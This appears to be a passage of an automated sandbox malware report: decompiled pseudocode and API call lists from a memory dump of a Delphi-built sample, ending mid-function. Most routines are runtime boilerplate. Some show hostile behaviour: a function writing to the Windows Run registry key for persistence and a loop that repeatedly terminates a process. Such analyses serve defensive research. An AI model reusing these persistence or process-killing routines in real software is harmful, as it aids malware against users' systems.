      • Part of subcall function 00402F8C: RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 86%
    			E0040A980(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    				char _v8;
    				struct _MEMORY_BASIC_INFORMATION _v36;
    				char _v297;
    				char _v304;
    				intOrPtr _v308;
    				char _v312;
    				char _v316;
    				char _v320;
    				intOrPtr _v324;
    				char _v328;
    				void* _v332;
    				char _v336;
    				char _v340;
    				char _v344;
    				char _v348;
    				intOrPtr _v352;
    				char _v356;
    				char _v360;
    				char _v364;
    				void* _v368;
    				char _v372;
    				intOrPtr _t52;
    				intOrPtr _t60;
    				intOrPtr _t82;
    				intOrPtr _t86;
    				intOrPtr _t89;
    				intOrPtr _t101;
    				void* _t108;
    				intOrPtr _t110;
    				void* _t113;
    
    				_t108 = __edi;
    				_v372 = 0;
    				_v336 = 0;
    				_v344 = 0;
    				_v340 = 0;
    				_v8 = 0;
    				_push(_t113);
    				_push(0x40ab3b);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t113 + 0xfffffe90;
    				_t89 =  *((intOrPtr*)(_a4 - 4));
    				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
    					_t52 =  *0x453064; // 0x405f58
    					E00405824(_t52,  &_v8);
    				} else {
    					_t86 =  *0x453120; // 0x405f50
    					E00405824(_t86,  &_v8);
    				}
    				_t110 =  *((intOrPtr*)(_t89 + 0x18));
    				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
    				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
    					_v368 =  *(_t89 + 0xc);
    					_v364 = 5;
    					_v360 = _v8;
    					_v356 = 0xb;
    					_v352 = _t110;
    					_v348 = 5;
    					_t60 =  *0x453068; // 0x405f00
    					E00405824(_t60,  &_v372);
    					E0040A5A8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
    				} else {
    					_v332 =  *(_t89 + 0xc);
    					_v328 = 5;
    					E004040F8( &_v340, 0x105,  &_v297);
    					E00407660(_v340,  &_v336);
    					_v324 = _v336;
    					_v320 = 0xb;
    					_v316 = _v8;
    					_v312 = 0xb;
    					_v308 = _t110;
    					_v304 = 5;
    					_t82 =  *0x4530a0; // 0x405ff8
    					E00405824(_t82,  &_v344);
    					E0040A5A8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
    				}
    				_pop(_t101);
    				 *[fs:eax] = _t101;
    				_push(E0040AB42);
    				E00403E88( &_v372);
    				E00403EAC( &_v344, 3);
    				return E00403E88( &_v8);
    			}

    APIs
      • Part of subcall function 00405824: LoadStringA.USER32(00000000,00010000,?,00000400), ref: 00405855
    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040AB3B), ref: 0040A9EB
    • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040AB3B), ref: 0040AA0D
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31C(intOrPtr* __eax, intOrPtr __ecx, void* __edx, void* __fp0, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t73;
    				intOrPtr _t74;
    				intOrPtr _t83;
    				intOrPtr _t86;
    				intOrPtr* _t87;
    				void* _t93;
    
    				_t93 = __fp0;
    				_v8 = __ecx;
    				_t73 = __edx;
    				_t87 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t73);
    				} else {
    					_v12 = _t73 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t74 = 0x40a49c;
    				_t86 = 0x40a49c;
    				_t83 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t87, _t83) != 0) {
    					_t74 = E00404348( *((intOrPtr*)(_t87 + 4)));
    					_t69 = E00407764(_t74, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
    						_t86 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t87,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t74;
    				_v832 = 6;
    				_v828 = _t86;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t93, 4,  &_v860);
    				return E00407764(_v8, _t86);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A31A(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    				char _v273;
    				char _v534;
    				char _v790;
    				struct _MEMORY_BASIC_INFORMATION _v820;
    				char _v824;
    				intOrPtr _v828;
    				char _v832;
    				intOrPtr _v836;
    				char _v840;
    				intOrPtr _v844;
    				char _v848;
    				char* _v852;
    				char _v856;
    				char _v860;
    				char _v1116;
    				void* __edi;
    				struct HINSTANCE__* _t40;
    				intOrPtr _t51;
    				struct HINSTANCE__* _t53;
    				void* _t69;
    				void* _t74;
    				intOrPtr _t75;
    				intOrPtr _t85;
    				intOrPtr _t89;
    				intOrPtr* _t92;
    				void* _t105;
    
    				_v8 = __ecx;
    				_t74 = __edx;
    				_t92 = __eax;
    				VirtualQuery(__edx,  &_v820, 0x1c);
    				if(_v820.State != 0x1000 || GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105) == 0) {
    					_t40 =  *0x454660; // 0x400000
    					GetModuleFileNameA(_t40,  &_v534, 0x105);
    					_v12 = E0040A310(_t74);
    				} else {
    					_v12 = _t74 - _v820.AllocationBase;
    				}
    				E0040778C( &_v273, 0x104, E0040B24C(0x5c) + 1);
    				_t75 = 0x40a49c;
    				_t89 = 0x40a49c;
    				_t85 =  *0x406188; // 0x4061d4
    				if(E004032A0(_t92, _t85) != 0) {
    					_t75 = E00404348( *((intOrPtr*)(_t92 + 4)));
    					_t69 = E00407764(_t75, 0x40a49c);
    					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
    						_t89 = 0x40a4a0;
    					}
    				}
    				_t51 =  *0x453108; // 0x405f28
    				_t16 = _t51 + 4; // 0xffe8
    				_t53 =  *0x454660; // 0x400000
    				LoadStringA(E00404DCC(_t53),  *_t16,  &_v790, 0x100);
    				E00403064( *_t92,  &_v1116);
    				_v860 =  &_v1116;
    				_v856 = 4;
    				_v852 =  &_v273;
    				_v848 = 6;
    				_v844 = _v12;
    				_v840 = 5;
    				_v836 = _t75;
    				_v832 = 6;
    				_v828 = _t89;
    				_v824 = 6;
    				E00407CAC(_v8,  &_v790, _a4, _t105, 4,  &_v860);
    				return E00407764(_v8, _t89);
    			}

    APIs
    • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
    • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
    • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
    • LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 65%
    			E00402F8C() {
    				void* _v8;
    				char _v12;
    				int _v16;
    				signed short _t12;
    				signed short _t14;
    				intOrPtr _t27;
    				void* _t29;
    				void* _t31;
    				intOrPtr _t32;
    
    				_t29 = _t31;
    				_t32 = _t31 + 0xfffffff4;
    				_v12 =  *0x419020 & 0x0000ffff;
    				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
    					_t12 =  *0x419020; // 0x1332
    					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
    					 *0x419020 = _t14;
    					return _t14;
    				} else {
    					_push(_t29);
    					_push(E00402FFD);
    					_push( *[fs:eax]);
    					 *[fs:eax] = _t32;
    					_v16 = 4;
    					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
    					_pop(_t27);
    					 *[fs:eax] = _t27;
    					_push(0x403004);
    					return RegCloseKey(_v8);
    				}
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
    • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
    • RegCloseKey.ADVAPI32(?,00403004,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FF7
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 64%
    			E0040A038(void* __esi, void* __eflags) {
    				char _v8;
    				intOrPtr* _t18;
    				intOrPtr _t26;
    				void* _t27;
    				long _t29;
    				intOrPtr _t32;
    				void* _t33;
    
    				_t33 = __eflags;
    				_push(0);
    				_push(_t32);
    				_push(0x40a0cf);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t32;
    				E00409DB0(GetThreadLocale(), 0x40a0e4, 0x100b,  &_v8);
    				_t29 = E00407174(0x40a0e4, 1, _t33);
    				if(_t29 + 0xfffffffd - 3 < 0) {
    					EnumCalendarInfoA(E00409F84, GetThreadLocale(), _t29, 4);
    					_t27 = 7;
    					_t18 = 0x454764;
    					do {
    						 *_t18 = 0xffffffff;
    						_t18 = _t18 + 4;
    						_t27 = _t27 - 1;
    					} while (_t27 != 0);
    					EnumCalendarInfoA(E00409FC0, GetThreadLocale(), _t29, 3);
    				}
    				_pop(_t26);
    				 *[fs:eax] = _t26;
    				_push(E0040A0D6);
    				return E00403E88( &_v8);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
    • EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
    • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
    • EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 82%
    			E0040A0E8(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char _v20;
    				char _v24;
    				void* _t41;
    				signed int _t45;
    				signed int _t47;
    				signed int _t49;
    				signed int _t51;
    				intOrPtr _t75;
    				void* _t76;
    				signed int _t77;
    				signed int _t83;
    				signed int _t92;
    				intOrPtr _t111;
    				void* _t122;
    				void* _t124;
    				intOrPtr _t127;
    				void* _t128;
    
    				_t128 = __eflags;
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_push(0);
    				_t122 = __edx;
    				_t124 = __eax;
    				_push(_t127);
    				_push(0x40a2b2);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t127;
    				_t92 = 1;
    				E00403E88(__edx);
    				E00409DB0(GetThreadLocale(), 0x40a2c8, 0x1009,  &_v12);
    				if(E00407174(0x40a2c8, 1, _t128) + 0xfffffffd - 3 < 0) {
    					while(1) {
    						_t41 = E00404148(_t124);
    						__eflags = _t92 - _t41;
    						if(_t92 > _t41) {
    							goto L28;
    						}
    						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
    						asm("bt [0x419108], eax");
    						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
    							_t45 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2cc);
    							__eflags = _t45;
    							if(_t45 != 0) {
    								_t47 = E004077C0(_t124 + _t92 - 1, 4, 0x40a2dc);
    								__eflags = _t47;
    								if(_t47 != 0) {
    									_t49 = E004077C0(_t124 + _t92 - 1, 2, 0x40a2f4);
    									__eflags = _t49;
    									if(_t49 != 0) {
    										_t51 =  *(_t124 + _t92 - 1) - 0x59;
    										__eflags = _t51;
    										if(_t51 == 0) {
    											L24:
    											E00404150(_t122, 0x40a30c);
    										} else {
    											__eflags = _t51 != 0x20;
    											if(_t51 != 0x20) {
    												E00404070();
    												E00404150(_t122, _v24);
    											} else {
    												goto L24;
    											}
    										}
    									} else {
    										E00404150(_t122, 0x40a300);
    										_t92 = _t92 + 1;
    									}
    								} else {
    									E00404150(_t122, 0x40a2ec);
    									_t92 = _t92 + 3;
    								}
    							} else {
    								E00404150(_t122, 0x40a2d8);
    								_t92 = _t92 + 1;
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						} else {
    							_v8 = E0040B04C(_t124, _t92);
    							E004043A8(_t124, _v8, _t92,  &_v20);
    							E00404150(_t122, _v20);
    							_t92 = _t92 + _v8;
    						}
    					}
    				} else {
    					_t75 =  *0x45473c; // 0x9
    					_t76 = _t75 - 4;
    					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
    						_t77 = 1;
    					} else {
    						_t77 = 0;
    					}
    					if(_t77 == 0) {
    						E00403EDC(_t122, _t124);
    					} else {
    						while(_t92 <= E00404148(_t124)) {
    							_t83 =  *(_t124 + _t92 - 1) - 0x47;
    							__eflags = _t83;
    							if(_t83 != 0) {
    								__eflags = _t83 != 0x20;
    								if(_t83 != 0x20) {
    									E00404070();
    									E00404150(_t122, _v16);
    								}
    							}
    							_t92 = _t92 + 1;
    							__eflags = _t92;
    						}
    					}
    				}
    				L28:
    				_pop(_t111);
    				 *[fs:eax] = _t111;
    				_push(E0040A2B9);
    				return E00403EAC( &_v24, 4);
    			}

    APIs
    • GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 90%
    			E0041763C(void* __ecx, intOrPtr* __edx) {
    				char _v20;
    				intOrPtr _v24;
    				char _v28;
    				intOrPtr _v32;
    				char _v36;
    				intOrPtr _v40;
    				char _v44;
    				char _v48;
    				void* _t22;
    				void* _t35;
    				intOrPtr* _t38;
    				void* _t47;
    
    				_t47 = __ecx;
    				_t38 = __edx;
    				E00403E88(__ecx);
    				if(_t38 == 0) {
    					return E00403EDC(_t47, "0.0.0.0");
    				}
    				if( *_t38 + 0xd0 - 0xa >= 0) {
    					_t22 = E00404348(_t38);
    					_push(_t22);
    					L0040C4F8();
    					if(_t22 != 0) {
    						_v48 = 0;
    						_v44 = 0;
    						_v40 = 0;
    						_v36 = 0;
    						_v32 = 0;
    						_v28 = 0;
    						_v24 = 0;
    						_v20 = 0;
    						return E00407CEC("%d.%d.%d.%d", 3,  &_v48, _t47);
    					}
    				} else {
    					_t35 = E00404348(_t38);
    					_push(_t35);
    					L0040C4C8();
    					_t22 = _t35 + 1;
    					if(_t22 != 0) {
    						return E00403EDC(_t47, _t38);
    					}
    				}
    				return _t22;
    			}

    APIs
    • inet_addr.WSOCK32(00000000), ref: 00417665
    • gethostbyname.WSOCK32(00000000), ref: 00417680
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 68%
    			E004185E8(intOrPtr __eax, void* __ebx, char __edx) {
    				intOrPtr _v8;
    				char _v12;
    				void* _v16;
    				char _v20;
    				int _t28;
    				char* _t41;
    				intOrPtr _t47;
    				void* _t51;
    
    				_v20 = 0;
    				_v12 = __edx;
    				_v8 = __eax;
    				E00404338(_v8);
    				E00404338(_v12);
    				_push(_t51);
    				_push(0x418692);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t51 + 0xfffffff0;
    				RegOpenKeyExA(0x80000001, "software\\microsoft\\windows\\currentversion\\run", 0, 0xf003f,  &_v16);
    				_t41 = E00404348(_v12);
    				E00404080( &_v20, _t41);
    				_t28 = E00404148(_v20);
    				RegSetValueExA(_v16, E00404348(_v8), 0, 1, _t41, _t28);
    				RegCloseKey(_v16);
    				_pop(_t47);
    				 *[fs:eax] = _t47;
    				_push(E00418699);
    				E00403E88( &_v20);
    				return E00403EAC( &_v12, 2);
    			}

    APIs
    • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041862D
    • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 00418661
    • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000000,80000001,software\microsoft\windows\currentversion\run,00000000,000F003F,?,00000000,00418692,?,00000000), ref: 0041866A
    Strings
    • software\microsoft\windows\currentversion\run, xrefs: 00418623
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00418B04() {
    				char _v8;
    				intOrPtr* _t3;
    				long _t13;
    				void* _t20;
    				void* _t21;
    				intOrPtr _t24;
    				void* _t26;
    
    				 *((intOrPtr*)(_t3 +  *_t3)) =  *((intOrPtr*)(_t3 +  *_t3)) + _t4;
    				_push(0);
    				_t26 = 0;
    				_push(_t24);
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t24;
    				L2:
    				E00403F20( &_v8,  *0x454a5c);
    				E00418A14(0x454a5c, _t20, _t21);
    				E00404294(_v8,  *0x454a5c);
    				if(_t26 != 0) {
    					_t26 = E00418560(_t26);
    					if(_t26 == 0) {
    						_t13 =  *0x454a60; // 0x0
    						TerminateProcess(OpenProcess(1, 0, _t13), 0);
    					}
    				}
    				Sleep(0x4e20);
    				goto L2;
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 75%
    			E00418B0C() {
    				char _v8;
    				long _t10;
    				void* _t17;
    				void* _t18;
    				intOrPtr _t20;
    				void* _t21;
    
    				_push(0);
    				_t21 = 0;
    				_push(0x418b82);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t20;
    				while(1) {
    					E00403F20( &_v8,  *0x454a5c);
    					E00418A14(0x454a5c, _t17, _t18);
    					E00404294(_v8,  *0x454a5c);
    					if(_t21 != 0) {
    						_t21 = E00418560(_t21);
    						if(_t21 == 0) {
    							_t10 =  *0x454a60; // 0x0
    							TerminateProcess(OpenProcess(1, 0, _t10), 0);
    						}
    					}
    					Sleep(0x4e20);
    				}
    			}

    APIs
      • Part of subcall function 00418A14: Sleep.KERNEL32(00002710,00000000,00418ACB,?,?,00000000,00000000,00000000,00000000,?,00418CFA,00000000,00418D4A,?,00000000,00418D7B), ref: 00418AA9
    • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B55
    • TerminateProcess.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00418B82,?,?,00000000), ref: 00418B5B
    • Sleep.KERNEL32(00004E20,00000000,00418B82,?,?,00000000), ref: 00418B65
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040BAA0() {
    				_Unknown_base(*)()* _t1;
    				struct HINSTANCE__* _t3;
    
    				_t1 = GetModuleHandleA("kernel32.dll");
    				_t3 = _t1;
    				if(_t3 != 0) {
    					_t1 = GetProcAddress(_t3, "GetDiskFreeSpaceExA");
    					 *0x41912c = _t1;
    				}
    				if( *0x41912c == 0) {
    					 *0x41912c = E004076D4;
    					return E004076D4;
    				}
    				return _t1;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAA6
    • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA,kernel32.dll,?,0040C485,00000000,0040C498), ref: 0040BAB7
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 81%
    			E00409161(void* __ecx, void* __edx, void* __edi) {
    				signed int _t166;
    				signed int _t168;
    				signed int _t170;
    				signed int _t172;
    				signed int _t181;
    				void* _t183;
    				intOrPtr _t224;
    				intOrPtr _t227;
    				signed int _t232;
    				void* _t250;
    				void* _t252;
    				intOrPtr _t272;
    				signed int _t281;
    				void* _t282;
    
    				L0:
    				while(1) {
    					L0:
    					E004089D8(_t282);
    					_t281 =  *((intOrPtr*)(_t282 - 4)) - 1;
    					if(E004077C0(_t281, 5, 0x409418) != 0) {
    						_t166 = E004077C0(_t281, 3, 0x409420);
    						__eflags = _t166;
    						if(_t166 != 0) {
    							_t168 = E004077C0(_t281, 4, 0x409424);
    							__eflags = _t168;
    							if(_t168 != 0) {
    								_t170 = E004077C0(_t281, 4, 0x40942c);
    								__eflags = _t170;
    								if(_t170 != 0) {
    									_t172 = E004077C0(_t281, 3, 0x409434);
    									__eflags = _t172;
    									if(_t172 != 0) {
    										E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									} else {
    										E004089A0(_t282);
    										_pop(_t250);
    										E00408908( *((intOrPtr*)(0x4546fc + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t250,  *((intOrPtr*)(_t282 + 8)));
    										 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    									}
    								} else {
    									E004089A0(_t282);
    									_pop(_t252);
    									E00408908( *((intOrPtr*)(0x454718 + (E00408888(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t282 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t252,  *((intOrPtr*)(_t282 + 8)));
    									 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								}
    							} else {
    								__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    								if( *((short*)(_t282 - 0x16)) >= 0xc) {
    									_t224 =  *0x454694; // 0x0
    									E00408908(_t224, 4,  *((intOrPtr*)(_t282 + 8)));
    								} else {
    									_t227 =  *0x454690; // 0x0
    									E00408908(_t227, 4,  *((intOrPtr*)(_t282 + 8)));
    								}
    								 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 3;
    								 *((char*)(_t282 - 0x1e)) = 1;
    							}
    						} else {
    							__eflags =  *((short*)(_t282 - 0x16)) - 0xc;
    							if( *((short*)(_t282 - 0x16)) >= 0xc) {
    								__eflags = _t281;
    							}
    							E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    							 *((intOrPtr*)(_t282 - 4)) =  *((intOrPtr*)(_t282 - 4)) + 2;
    							 *((char*)(_t282 - 0x1e)) = 1;
    						}
    					} else {
    						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
    						if( *((short*)(__ebp - 0x16)) >= 0xc) {
    							__esi = __esi + 3;
    							__eflags = __esi;
    						}
    						__eax =  *(__ebp + 8);
    						__edx = 2;
    						__eax = __esi;
    						__eax = E004088C4(2,  *(__ebp + 8));
    						 *(__ebp - 4) =  *(__ebp - 4) + 4;
    						 *((char*)(__ebp - 0x1e)) = 1;
    					}
    					while(1) {
    						L109:
    						_t164 =  *((intOrPtr*)( *((intOrPtr*)(_t282 - 4))));
    						if(_t164 == 0) {
    							break;
    						}
    						L1:
    						 *(_t282 - 5) = _t164;
    						asm("bt [0x419108], eax");
    						if(( *(_t282 - 5) & 0x000000ff) >= 0) {
    							 *((intOrPtr*)(_t282 - 4)) = E0040B044( *((intOrPtr*)(_t282 - 4)));
    							_t181 =  *(_t282 - 5);
    							__eflags = _t181 + 0x9f - 0x1a;
    							if(_t181 + 0x9f - 0x1a < 0) {
    								_t181 = _t181 - 0x20;
    								__eflags = _t181;
    							}
    							L5:
    							__eflags = _t181 + 0xbf - 0x1a;
    							if(_t181 + 0xbf - 0x1a >= 0) {
    								L10:
    								_t183 = (_t181 & 0x000000ff) + 0xffffffde;
    								__eflags = _t183 - 0x38;
    								if(_t183 > 0x38) {
    									L108:
    									E004088C4(1,  *((intOrPtr*)(_t282 + 8)));
    									continue;
    								}
    								L11:
    								switch( *((intOrPtr*)( *(_t183 + 0x408d6b) * 4 +  &M00408DA4))) {
    									case 0:
    										goto L108;
    									case 1:
    										L12:
    										E00408974(_t282);
    										E004089A0(_t282);
    										__eflags =  *((intOrPtr*)(_t282 - 0xc)) - 2;
    										if( *((intOrPtr*)(_t282 - 0xc)) > 2) {
    											E00408928( *(_t282 - 0xe) & 0x0000ffff, 4, _t288,  *((intOrPtr*)(_t282 + 8)));
    										} else {
    											E00408928(( *(_t282 - 0xe) & 0x0000ffff) % 0x64, 2, _t288,  *((intOrPtr*)(_t282 + 8)));
    										}
    										goto L109;
    									case 2:
    										L15:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x24;
    										 *(__ebp - 0xc) = E00408A18( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
    										__eax =  *(__ebp - 0x24);
    										__eax = E00408908( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 3:
    										L16:
    										E00408974(__ebp) = E004089A0(__ebp);
    										__eax =  *(__ebp + 8);
    										__edx = __ebp - 0x28;
    										 *(__ebp - 0xc) = E00408B80( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
    										__eax =  *(__ebp - 0x28);
    										__eax = E00408908( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
    										goto L109;
    									case 4:
